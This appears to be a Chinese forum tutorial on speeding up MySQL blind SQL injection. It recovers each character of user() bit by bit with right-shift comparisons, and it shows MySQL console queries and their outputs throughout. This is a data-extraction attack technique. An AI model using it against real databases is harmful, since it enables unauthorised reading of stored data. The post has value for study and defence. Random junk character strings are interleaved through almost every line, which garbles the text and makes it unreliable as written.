关于通过对8bit的ascii做右位移提高mysql盲注效率

admin

通过这种方法我们只需要做8次select来确定一个键值的第一位或第n位

  Y( ^2 j6 W  H) J+ N' P& c
( p: i1 {, @+ i  Y* M6 J3 M, ^
下面将以查询mysql数据库当中user()的第一位为例:
! A  @* g' U- m  z) S2 V
$ y/ t2 \- L' G& {' n

ps:第二位,第三位依次类推 select substr(user(),2,1) mysql> select substr(user(),3,1)


  x4 k) a$ c% ~! E% u) _) f
+ _! Y# E8 d1 [8 ~4 ~5 e% }首先执行如下sql语句:

3 u% h/ g# ]; ]; J9 T5 |
( ?* D/ F+ S% x0 }: ^' s% s
3 _% o' [8 w. W+ r. Zmysql> select (ascii((substr(user(),1,1))) >> 7)=0;

  A3 ~& r5 N  f+ l* b! m

我们将对这个8bit的ascii也就是user()的第一位做7次右偏移,也就是偏移到8bit的ascii的


( l3 `* o. i' {$ N1 \- B
第一位并与0做等运算,如果,运算结果为0 说明第一位不为0,也就为1

: }  {+ q9 |2 `
; X2 Q4 b3 v- b3 h7 D0 y
5 a+ r& T/ z3 e* f如果运算结果为1,说明第一位为0,不为1



+————————————–+
- T; @" t8 Z, F  r
( Z% D, N0 ^6 f9 n, @| (ascii((substr(user(),1,1))) >> 7)=0 |
" H; H; @) F0 h0 ~. ^
1 g9 a2 T: m1 G' ^2 K, v+————————————–+
  n7 D, a) N$ M( s/ [9 B$ j* _
% H2 F: Z. v; D; n, B6 {| 1 |

+————————————–+
' D3 C& C0 c1 y
8 M1 t* U" l6 |, m. C1 row in set (0.00 sec)
+ f" I( N) k7 a& t) K; ]
这样我们就确定这个8bit的ascii的第一位为0
+ k* J$ Q3 o  V8 P
4 ^# t; N! @8 Q5 d2 B2 l/ u
3 m. E7 d! d6 X+ p( z
4 P/ _& i6 l. m第二次我们来做6次右偏移来确定前两位

8 x# c8 U9 n9 G7 H
1 |8 E1 a4 v% }- q+ x
前两位可能是01或00,即依然可以与0做比较,
7 R- S1 P9 b4 b6 O/ i. u2 g
mysql> select (ascii((substr(user(),1,1))) >> 6)=0;
5 K9 T7 P1 a/ T$ Z" l* ^$ ?
% J( y' w6 I" e% l% r( G6 u+————————————–+

| (ascii((substr(user(),1,1))) >> 6)=0 |

+————————————–+
8 z6 i3 N' j+ d, r) B9 {
) S3 ]$ [8 g8 Y  L| 0 |
8 }7 w8 x+ ^$ j) W2 i8 {
% m% w/ P  o$ L3 D% a/ E3 ]+ ?+————————————–+

1 row in set (0.00 sec)


! V8 U8 d; c# v: ~+ F( o
结果为0,即第二位为1



) }# P0 W3 S) \) w% ]2 _开始猜测前三位为010或011


2 K/ |0 j. H* u7 a7 `, S! F# [3 d
# J3 C2 d) C7 T. |2 W让我们看看010和011的ascii码是多少
' P& j1 r" \$ f) g) A: N8 L
0 H" Q* z' d1 @) y7 b, P: x/ _4 ~2 @

分别查询select b’011′ select b’010′
. t# M0 u$ ~! G3 {/ F: T0 h

- [6 T8 }, y4 u6 H1 F/ |
& _% N5 g) N& v2 B! T9 w  E5 G( R获得结果 010 = 2 011 = 3
% a0 ]+ F% b& k

+ x( c, {9 b7 C5 a/ C8 g
执行如下sql:
1 S5 E  w1 ?1 n0 o- [$ B% {

9 T. Y% O* N9 _  F7 P' n' G/ n, |& d  V
) c# ~7 ^* y' F$ Y. Amysql> select (ascii((substr(user(),1,1))) >> 5)=2;

. w' v  w' h9 c, D+————————————–+
4 R& v* E" B1 q' e8 ~
| (ascii((substr(user(),1,1))) >> 5)=2 |
7 h) y6 O( o/ k) L
& N0 i2 b% v/ z+ l7 |8 H+————————————–+
. r; j6 x- A5 s( ?% Q, x
( ^: r" W- K/ E: K2 @  J* o| 0 |
9 y1 E) f7 E4 L
+————————————–+
5 r+ s  y! i, M
即前三位不为010,而是011
& r& u5 R' c9 p1 m! X$ e; E! e; Q/ s


直到获得最后一位

4 E3 }# G6 g$ t' @, `$ V9 ~+ [
  Z/ f) L$ H' W+ {6 z; `, N( `
! p) Z8 b0 o% V5 W5 V( ~最终结果为:01110010
# q8 ?9 T. t8 f5 a

9 o1 S, C" x( R# t! p
转换一下:
' r* X# x% W! s% [
! Z& V+ d' E  {8 }/ U& \2 k& A4 x
: A6 }& ^2 H0 ]9 u, [  s! [
select b’01110010′
/ M/ n* ^5 n# e( _0 X( @
; c8 O: |, n. [( T! _4 b' e

查询结果



$ B0 j4 }9 u' A" R+ _" b: {+————-+
9 g9 d% t: e8 ~/ J0 [: L0 k
| b’01110010′ |
3 q4 B. Z0 T  L% _( t3 t& ^
/ R  l0 l" r; ]5 l& ~' ?+————-+
7 Z1 b* O4 m+ D, k& \, a' S9 W2 M$ ^
| r |
! U: T5 P: k# W/ f+ p9 H4 _
+————-+

% \  ]" [6 b6 C1 row in set (0.00 sec)
2 ]) m+ W# e; ?/ n$ `5 g
. J0 D$ `9 }# t" d4 f
0 |+ |4 ^  C  S$ x+ {$ B* D
这样我们就获得了user()的第一位.其它位依此类推
, ?1 C3 x$ D% g